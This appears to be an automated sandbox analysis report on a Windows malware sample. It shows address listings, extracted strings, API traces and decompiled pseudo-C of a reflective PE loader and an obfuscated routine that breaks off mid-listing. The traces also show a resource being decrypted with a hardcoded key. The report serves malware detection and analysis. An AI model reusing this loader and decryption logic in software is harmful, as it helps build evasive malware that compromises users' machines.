0x00212daf
0x00212dc2
0x00212dc9
0x00212dd4
0x00212ddf
0x00212dea
0x00212df5
0x00212e00
0x00212e0b
0x00212e16
0x00212e21
0x00212e2c
0x00212e34
0x00212e3f
0x00212e4a
0x00212e55
0x00212e5d
0x00212e68
0x00212e73
0x00212e7e
0x00212e89
0x00212e94
0x00212e9f
0x00212eac
0x00212eb7
0x00212ec2
0x00212ecd
0x00212ed8
0x00212ee3
0x00212eee
0x00212ef9
0x00212f01
0x00212f0c
0x00212f17
0x00212f2c
0x00212f2f
0x00212f30
0x00212f37
0x00212f42
0x00212f4d
0x00212f58
0x00212f6e
0x00212f75
0x00212f80
0x00212f8b
0x00212f96
0x00212fa1
0x00212fac
0x00212fb7
0x00212fbf
0x00212fca
0x00212fd2
0x00212fda
0x00212fdf
0x00212fe7
0x00212fef
0x00212ffa
0x00213005
0x00213010
0x00213025
0x0021302c
0x00213037
0x00213042
0x0021304d
0x00213058
0x00213063
0x00213076
0x0021307d
0x00213088
0x00213093
0x0021309e
0x002130a9
0x002130b4
0x002130c6
0x002130c9
0x002130d0
0x002130db
0x002130e6
0x002130f3
0x002130f7
0x002130ff
0x00213104
0x0021310c
0x00213117
0x00213122
0x0021312d
0x00213138
0x0021314b
0x00213154
0x0021315f
0x00213167
0x0021316f
0x00213177
0x0021317c
0x00213184
0x00213192
0x00213197
0x002131a1
0x002131a4
0x002131ad
0x002131b1
0x002131b9
0x002131cc
0x002131d3
0x002131de
0x002131e9
0x002131f4
0x002131ff
0x00213207
0x00213212
0x0021321d
0x00213228
0x00213230
0x0021323b
0x00213246
0x00213251
0x0021325c
0x00213267
0x00213272
0x0021327a
0x00213285
0x00213290
0x00213298
0x002132a3
0x002132ab
0x002132b6
0x002132c1
0x002132c9
0x002132d4
0x002132df
0x002132ea
0x002132f5
0x00213300
0x0021330b
0x00213316
0x0021331e
0x00213329
0x00213334
0x00213347
0x0021334e
0x00213359
0x00213364
0x0021336f
0x0021337a
0x00213385
0x00213390
0x0021339b
0x002133a6
0x002133ae
0x002133b9
0x002133c1
0x002133ce
0x002133d2
0x002133da
0x002133e2
0x002133ed
0x002133f5
0x00213402
0x0021340d
0x00213418
0x00213423
0x0021342e
0x00213439
0x00213444
0x0021344f
0x00213457
0x00213465
0x0021346a
0x00213470
0x00213474
0x0021347c
0x00213487
0x00213492
0x0021349d
0x002134a8
0x002134b3
0x002134bb
0x002134c3
0x002134c8
0x002134d0
0x002134db
0x002134e6
0x002134f1
0x002134fc
0x0021350e
0x00213513
0x0021351c
0x00213527
0x00213532
0x0021353d
0x00213548
0x00213550
0x0021355b
0x00213566
0x00213571
0x0021357c
0x00213587
0x0021358f
0x0021359a
0x002135a2
0x002135af
0x002135b0
0x002135b4
0x002135bc
0x002135c4
0x002135cf
0x002135da
0x002135e5
0x002135f0
0x002135fb
0x00213606
0x00213611
0x00213619
0x0021361e
0x00213626
0x0021362b
0x00213633
0x00213647
0x0021364e
0x00213656
0x00213661
0x00213669
0x00213679
0x0021367e
0x00213684
0x0021368c
0x00213699
0x0021369c
0x002136a0
0x002136a8
0x002136b0
0x002136b8
0x002136c3
0x002136ce
0x002136d9
0x002136e4
0x002136ef
0x002136f7
0x00213702
0x0021370d
0x00213723
0x0021372a
0x00213735
0x00213740
0x0021374d
0x00213750
0x0021375c
0x00213760
0x00213765
0x0021376d
0x00213778
0x00213780
0x0021378b
0x0021379e
0x0021379f
0x002137a6
0x002137ae
0x002137b9
0x002137c1
0x002137c6
0x002137cb
0x002137d0
0x002137d8
0x002137e3
0x002137f6
0x002137fd
0x00213808
0x00213810
0x00213818
0x0021381d
0x00213822
0x0021382a
0x0021383d
0x0021384d
0x00213854
0x0021385f
0x0021386a
0x00213875
0x0021387d
0x00213888
0x00213890
0x0021389d
0x002138a1
0x002138a9
0x002138b3
0x002138be
0x002138c9
0x002138d1
0x002138dc
0x002138e4
0x002138e9
0x002138f1
0x002138f9
0x00213901
0x0021390c
0x00213917
0x00213922
0x0021392d
0x00213938
0x00213940
0x0021394b
0x00213953
0x00213958
0x00213960
0x00213965
0x0021396d
0x00213978
0x00213980
0x0021398b
0x00213993
0x0021399b
0x002139a9
0x002139ae
0x002139b4
0x002139bc
0x002139c4
0x002139c9
0x002139d1
0x002139d9
0x002139e1
0x002139f4
0x002139f7
0x002139fe
0x00213a09
0x00213a14
0x00213a1f
0x00213a2a
0x00213a35
0x00213a3d
0x00213a48
0x00213a53
0x00213a5e
0x00213a74
0x00213a82
0x00213a87
0x00213a90
0x00213a9b
0x00213aa6
0x00213ab1
0x00213abc
0x00213ac8
0x00213acb
0x00213acf
0x00213adc
0x00213ae0
0x00213ae8
0x00213b00
0x00213b09
0x00213b14
0x00213b1f
0x00213b2a
0x00213b35
0x00213b40
0x00213b53
0x00213b54
0x00213b5b
0x00213b63
0x00213b6e
0x00213b81
0x00213b90
0x00213b97
0x00213ba2
0x00213bad
0x00213bc1
0x00213bd0
0x00213bd7
0x00213be2
0x00213bef
0x00213bf3
0x00213bfd
0x00213c01
0x00213c09
0x00213c11
0x00213c16
0x00213c1e
0x00213c26
0x00213c2e
0x00213c41
0x00213c48
0x00213c53
0x00213c5e
0x00213c69
0x00213c71
0x00213c79
0x00213c7e
0x00213c86
0x00213c8e
0x00213c99
0x00213ca4
0x00213caf
0x00213cba
0x00213cc5
0x00213ccd
0x00213cd8
0x00213ce3
0x00213ceb
0x00213cf6
0x00213d01
0x00213d14
0x00213d23
0x00213d2a
0x00213d32
0x00213d3d
0x00213d48
0x00213d50
0x00213d5b
0x00213d66
0x00213d6e
0x00213d7b
0x00213d8f
0x00213d9b
0x00213da2
0x00213dad
0x00213db8
0x00213dc3
0x00213dce
0x00213dd9
0x00213de4
0x00213df9
0x00213e01
0x00213e08
0x00213e13
0x00213e2a
0x00213e2e
0x00213e36
0x00213e3b
0x00213e43
0x00213e56
0x00213e65
0x00213e6c
0x00213e77
0x00213e7f
0x00213e87
0x00213e8f
0x00213e97
0x00213e9f
0x00213eaa
0x00213eb2
0x00213ec6
0x00213ecd
0x00213ed8
0x00213ee3
0x00213ef6
0x00213efd
0x00213f08
0x00213f08
0x00213f0d
0x00213f0d
0x00213f0d
0x00213f0d
0x00213f13
0x00213f13
0x00213f19
0x00213f19
0x00214295
0x00214297
0x002142cb
0x002142d4
0x002142dc
0x00213f0d
0x00213f0d
0x00213f0d
0x00213f13
0x00213f13
0x00000000
0x00213f13
0x00213f0d
0x002142a7
0x002142b0
0x002142b2
0x0021411e
0x0021411e
0x00213f0d
0x00213f0d
0x00213f0d
0x00213f13
0x00213f13
0x00000000
0x00213f13
0x00000000
0x00213f0d
0x00213f1f
0x00213f25
0x00214129
0x0021412f
0x002141a9
0x002141af
0x00214278
0x0021427f
0x00000000
0x0021427f
0x002141b5
0x002141bb
0x0021424e
0x00214255
0x00000000
0x00214255
0x002141bd
0x002141c3
0x00214214
0x0021421f
0x00214227
0x00000000
0x00214227
0x002141c5
0x002141cb
0x00000000
0x00000000
0x002141df
0x002141e8
0x002141f0
0x00000000
0x002141f0
0x00214131
0x00214837
0x00214851
0x00214858
0x00214858
0x00214137
0x0021413d
0x0021419a
0x0021419f
0x00000000
0x0021419f
0x0021413f
0x00214145
0x00214184
0x00214189
0x00000000
0x00214189
0x00214147
0x0021414d
0x0021416c
0x00000000
0x0021416c
0x0021414f
0x00214155
0x00000000
0x00000000
0x00214162
0x00000000
0x00214162
0x00213f2b
0x0021410d
0x00214116
0x00214118
0x00214118
0x00000000
0x00214118
0x00213f31
0x00213f37
0x00213ffd
0x00214003
0x002140ea
0x002140f5
0x002140fc
0x00000000
0x002140fc
0x00214009
0x0021400f
0x002140c9
0x002140ce
0x002140d5
0x00000000
0x002140d5
0x00214015
0x0021401b
0x0021405c
0x00214069
0x00214074
0x00214079
0x0021407c
0x0021407e
0x002140b4
0x002140b4
0x00000000
0x002140b4
0x00214080
0x00214096
0x0021409d
0x002140a3
0x002140aa
0x00000000
0x002140aa
0x0021401d
0x00214023
0x00000000
0x00000000
0x00214034
0x00214042
0x0021404b
0x0021404b
0x00000000
0x0021404b
0x00213f3d
0x00213fee
0x00213ff3
0x00000000
0x00213ff3
0x00213f49
0x00213fdd
0x00000000
0x00213fdd
0x00213f55
0x00213fc7
0x00213fcc
0x00213fd3
0x00000000
0x00213fd3
0x00213f5d
0x00213faf
0x00000000
0x00213faf
0x00213f65
0x00213f98
0x00213f9d
0x00213f9f
0x00000000
0x00213fa5
0x00213fa5
0x00000000
0x00213fa5
0x00213f9f
0x00213f6d
0x00000000
0x00213f73
0x00213f81
0x00213f86
0x00000000
0x00213f86
0x002142e7
0x002142e7
0x002142ed
0x00214632
0x00214638
0x00214736
0x0021473c
0x00214818
0x0021481d
0x00000000
0x0021481d
0x00214742
0x00214748
0x002147b9
0x002147dc
0x002147e1
0x002147f2
0x00214800
0x00214807
0x00000000
0x00214807
0x0021474a
0x00214750
0x00214778
0x00214783
0x00000000
0x00214783
0x00214752
0x00214758
0x00000000
0x00000000
0x00214769
0x0021476e
0x00000000
0x0021476e
0x0021463e
0x0021471a
0x00214725
0x0021472c
0x00000000
0x0021472c
0x00214644
0x0021464a
0x002146f7
0x002146fc
0x002146fe
0x00000000
0x00000000
0x00214704
0x00000000
0x00214704
0x00214650
0x00214656
0x002146d2
0x002146e0
0x00000000
0x002146e6
0x00214658
0x0021465e
0x0021468a
0x00214691
0x00214697
0x00214699
0x0021469b
0x002146a3
0x002146b3
0x002146ba
0x002146ba
0x00000000
0x002146ba
0x00214660
0x00214666
0x00000000
0x00000000
0x00214670
0x00214675
0x00000000
0x00214675
0x002142f3
0x0021461d
0x00214628
0x00000000
0x00214628
0x002142f9
0x002142ff
0x00214463
0x00214469
0x0021453f
0x0021454d
0x00214551
0x00214558
0x0021455f
0x00214567
0x00214568
0x0021456d
0x00214570
0x00214572
0x002145c8
0x002145fb
0x00214600
0x00214605
0x00214610
0x00214615
0x00214574
0x00214578
0x002145a2
0x002145a7
0x002145ac
0x002145b3
0x002145b5
0x002145b7
0x002145bc
0x002145bc
0x00213f08
0x00213f08
0x00000000
0x00213f08
0x00213f08
0x0021446f
0x00214475
0x002144f3
0x0021451d
0x00214522
0x00214527
0x0021452e
0x00214530
0x00214532
0x00214537
0x00000000
0x00214537
0x00214477
0x0021447d
0x002144d6
0x002144db
0x002144e2
0x00000000
0x002144e2
0x0021447f
0x00214485
0x00000000
0x00000000
0x00214499
0x002144ac
0x002144b5
0x002144bd
0x00000000
0x002144bd
0x00214305
0x002143e8
0x002143e8
0x002143ea
0x0021441b
0x00214427
0x0021442e
0x00214437
0x0021443e
0x00214440
0x00000000
0x00000000
0x0021444a
0x0021444f
0x00214451
0x00214459
0x00214459
0x00000000
0x00214459
0x00214453
0x00000000
0x00000000
0x00214455
0x00214457
0x00000000
0x00000000
0x00000000
0x00214457
0x002143ec
0x002143ec
0x00000000
0x002143ec
0x0021430b
0x0021430d
0x0021484c
0x00000000
0x0021484c
0x00214313
0x00214319
0x002143c3
0x002143c8
0x002143ca
0x00000000
0x00000000
0x002143d7
0x002143dc
0x00000000
0x002143dc
0x0021431f
0x00214325
0x0021436c
0x00214377
0x0021437e
0x00214380
0x00000000
0x00000000
0x00214394
0x00214399
0x002143a1
0x002143a6
0x002143ac
0x002143b4
0x002143b4
0x00000000
0x002143a6
0x00214327
0x0021432d
0x00000000
0x00000000
0x0021433e
0x0021434c
0x00214353
0x00214353
0x00214822
0x00214822
0x00000000
0x0021482e

Strings

T5W, xrefs: 00213C53
D'k., xrefs: 002142E7
yI, xrefs: 00213251
D>, xrefs: 002139E1
k, xrefs: 00213246
nY, xrefs: 00213ABC
C!), xrefs: 002138BE
=, xrefs: 002133B9
o, xrefs: 00212E21
=<, xrefs: 00212D79
jd, xrefs: 00213184
bY, xrefs: 002132DF
\$, xrefs: 00213ED8
QG)}, xrefs: 0021316F
,Bb*, xrefs: 00213C7E
ny, xrefs: 00213B6E
7Y, xrefs: 0021340D
~, xrefs: 00213633
G", xrefs: 00213A2A
q, xrefs: 002137D8
u, xrefs: 00213D3D
n\, xrefs: 00213C8E
71##, xrefs: 0021404B
nlvJ, xrefs: 002135B4
0vkX, xrefs: 00212EEE
P&, xrefs: 00212ED8
71##, xrefs: 00214459
o4-(, xrefs: 0021446F
d3, xrefs: 0021347C
o4-(, xrefs: 00213FDD
71##, xrefs: 00214532
kU, xrefs: 002134E6
+!, xrefs: 00213B63
[ , xrefs: 00212E3F
);, xrefs: 00213DA2
c, xrefs: 00213CBA
71##, xrefs: 002142F9
D'k., xrefs: 00214783
I], xrefs: 0021378B
; } //// function updateFrameRateGraph(info) { info.value.innerText = getCurrentFrameRateString(); //raw data is [ [prevFrameStartPerfCount, currentFrameStartPerfCount]+ ] _updateData(info, external, xrefs: 00212C7D, 00213F57, 00214414, 0021441A, 00214516, 0021451C
;R,], xrefs: 002135E5
DP, xrefs: 00213CD8
FM, xrefs: 00213E77
}%, xrefs: 002139D9

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$; } //// function updateFrameRateGraph(info) { info.value.innerText = getCurrentFrameRateString(); //raw data is [ [prevFrameStartPerfCount, currentFrameStartPerfCount]+ ] _updateData(info, external$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
API String ID: 0-523307782
Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction ID: 6f933e33ce7d54b9aef2a79c657d7c5acac07f1f374d7f56eea5a2268be7e4f9
Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction Fuzzy Hash: 77D214715193818BD378DF25C58ABDFBBE1BBD4304F10891DE19A862A0DBB48999CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100011C0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 177encryptionmemorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9

Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29

LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
_memmove.LIBCMT ref: 1000139C
CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5

Strings

LdrFindResource_U, xrefs: 10001241
jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx, xrefs: 1000134C
LdrAccessResource, xrefs: 10001282
ntdll.dll, xrefs: 1000120F
Control_RunDLL, xrefs: 100013CB

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
API String ID: 2007481169-3150289311
Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70

Uniqueness

Uniqueness Score: -1.00%

Function 10001B30, Relevance: 18.3, APIs: 12, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v44;
				char _v48;
				signed int _t67;
				void* _t72;
				long _t74;
				void* _t86;
				void* _t89;
				void* _t90;
				void* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				void* _t109;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t128;
				intOrPtr* _t129;
				signed int _t131;
				intOrPtr _t133;
				signed int _t135;
				long _t138;
				long _t139;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				_t113 = _a8;
				_t147 = 0;
				_v8 = __ecx;
				if(_t113 >= 0x40) {
					_t129 = _a4;
					if( *_t129 == 0x5a4d) {
						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
						if(_t113 < _t117 + 0xf8) {
							goto L1;
						} else {
							_t114 = _t117 + _t129;
							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
								goto L3;
							} else {
								_t12 = _t114 + 0x14; // 0xc033cd33
								_t67 =  *_t12 & 0x0000ffff;
								_t13 = _t114 + 6; // 0xe8ef4d8d
								_t135 =  *_t13 & 0x0000ffff;
								if(_t135 != 0) {
									_t14 = _t114 + 0x24; // 0x100013ef
									_t128 = _t14 + _t67;
									do {
										_t15 = _t128 + 4; // 0x12f7805
										_t133 =  *_t15;
										_t111 =  *_t128;
										if(_t133 != 0) {
											_t112 = _t111 + _t133;
										} else {
											_t16 = _t114 + 0x38; // 0xff1075ff
											_t112 = _t111 +  *_t16;
										}
										_t147 =  >  ? _t112 : _t147;
										_t128 = _t128 + 0x28;
										_t135 = _t135 - 1;
									} while (_t135 != 0);
								}
								_push( &_v48); // executed
								L100037FA(); // executed
								_t118 = _v44;
								_t19 = _t118 - 1; // -1
								_t20 = _t114 + 0x50; // 0xcc25d
								_t21 = _t118 - 1; // -1
								_t22 = _t118 - 1; // -1
								_t131 =  !_t21;
								_t138 = _t19 +  *_t20 & _t131;
								if(_t138 == (_t22 + _t147 & _t131)) {
									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
									_t148 = _t72;
									_v12 = _t148;
									if(_t148 != 0) {
										L18:
										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
										_t139 = _t74;
										if(_t139 != 0) {
											 *(_t139 + 4) = _t148;
											_t27 = _t114 + 0x16; // 0xe85ec033
											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
											_t40 = _t114 + 0x54; // 0xec8b55cc
											if(E100015F0(_a8,  *_t40) == 0) {
												L36:
												_t115 = _v8;
												goto L37;
											} else {
												_t42 = _t114 + 0x54; // 0xec8b55cc
												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
												_t43 = _t114 + 0x54; // 0xec8b55cc
												_t149 = _t86;
												E10001F40(_t149, _a4,  *_t43);
												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
												_t150 = _v12;
												 *_t139 = _t89;
												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
												if(_t90 == 0) {
													goto L36;
												} else {
													_t52 = _t114 + 0x34; // 0xec8b55cc
													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
													_t115 = _v8;
													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
														 *((intOrPtr*)(_t139 + 0x18)) = 1;
													} else {
														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
													}
													if(E10001470(_t115, _t139) == 0) {
														L37:
														E10001980(_t139);
														return 0;
													} else {
														_t95 = E10001830(_t115, _t139); // executed
														if(_t95 == 0 || E10001730(_t139) == 0) {
															goto L37;
														} else {
															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
															if(_t98 == 0) {
																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
																return _t139;
															} else {
																_t100 = _t98 + _t150;
																if( *(_t139 + 0x14) == 0) {
																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
																	return _t139;
																} else {
																	_push(0);
																	_push(1);
																	_push(0x10000000);
																	if( *_t100() != 0) {
																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
																		return _t139;
																	} else {
																		SetLastError(0x45a);
																		E10001980(_t139);
																		return 0;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											VirtualFree(_t148, _t74, 0x8000);
											goto L20;
										}
									} else {
										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
										_t148 = _t109;
										_v12 = _t109;
										if(_t148 == 0) {
											L20:
											SetLastError(0xe);
											return 0;
										} else {
											goto L18;
										}
									}
								} else {
									SetLastError(0xc1);
									return 0;
								}
							}
						}
					} else {
						L3:
						SetLastError(0xc1);
						return 0;
					}
				} else {
					L1:
					SetLastError(0xd);
					return 0;
				}
			}

0x10001b37
0x10001b3b
0x10001b3d
0x10001b43
0x10001b57
0x10001b62
0x10001b79
0x10001b84
0x00000000
0x10001b86
0x10001b8d
0x10001b90
0x00000000
0x10001ba3
0x10001ba3
0x10001ba3
0x10001ba8
0x10001ba8
0x10001bae
0x10001bb0
0x10001bb3
0x10001bb5
0x10001bb5
0x10001bb5
0x10001bb8
0x10001bbc
0x10001bc3
0x10001bbe
0x10001bbe
0x10001bbe
0x10001bbe
0x10001bc7
0x10001bca
0x10001bcd
0x10001bcd
0x10001bb5
0x10001bd3
0x10001bd4
0x10001bd9
0x10001bdc
0x10001bdf
0x10001be2
0x10001be5
0x10001be8
0x10001bec
0x10001bf2
0x10001c12
0x10001c15
0x10001c1b
0x10001c1d
0x10001c22
0x10001c3c
0x10001c47
0x10001c4d
0x10001c51
0x10001c73
0x10001c76
0x10001c83
0x10001c89
0x10001c8f
0x10001c95
0x10001c9b
0x10001ca1
0x10001ca4
0x10001cb1
0x10001db9
0x10001db9
0x00000000
0x10001cb7
0x10001cbe
0x10001cc2
0x10001cc8
0x10001ccb
0x10001cd1
0x10001ce2
0x10001ce4
0x10001cec
0x10001cef
0x10001cf2
0x10001cf9
0x00000000
0x10001cff
0x10001d04
0x10001d04
0x10001d07
0x10001d0a
0x10001d1a
0x10001d0c
0x10001d15
0x10001d15
0x10001d2b
0x10001dbc
0x10001dbf
0x10001dcc
0x10001d31
0x10001d34
0x10001d3b
0x00000000
0x10001d49
0x10001d4b
0x10001d50
0x10001da7
0x10001db6
0x10001d52
0x10001d52
0x10001d58
0x10001d99
0x10001da4
0x10001d5a
0x10001d5a
0x10001d5c
0x10001d5e
0x10001d67
0x10001d87
0x10001d96
0x10001d69
0x10001d6e
0x10001d77
0x10001d84
0x10001d84
0x10001d67
0x10001d58
0x10001d50
0x10001d3b
0x10001d2b
0x10001cf9
0x10001c53
0x10001c5a
0x00000000
0x10001c5a
0x10001c24
0x10001c2d
0x10001c33
0x10001c35
0x10001c3a
0x10001c60
0x10001c62
0x10001c70
0x00000000
0x00000000
0x00000000
0x10001c3a
0x10001bf4
0x10001bf9
0x10001c07
0x10001c07
0x10001bf2
0x10001b90
0x10001b64
0x10001b64
0x10001b69
0x10001b76
0x10001b76
0x10001b45
0x10001b45
0x10001b47
0x10001b54
0x10001b54

APIs

SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00224B41, Relevance: 15.2, Strings: 12, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00224B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
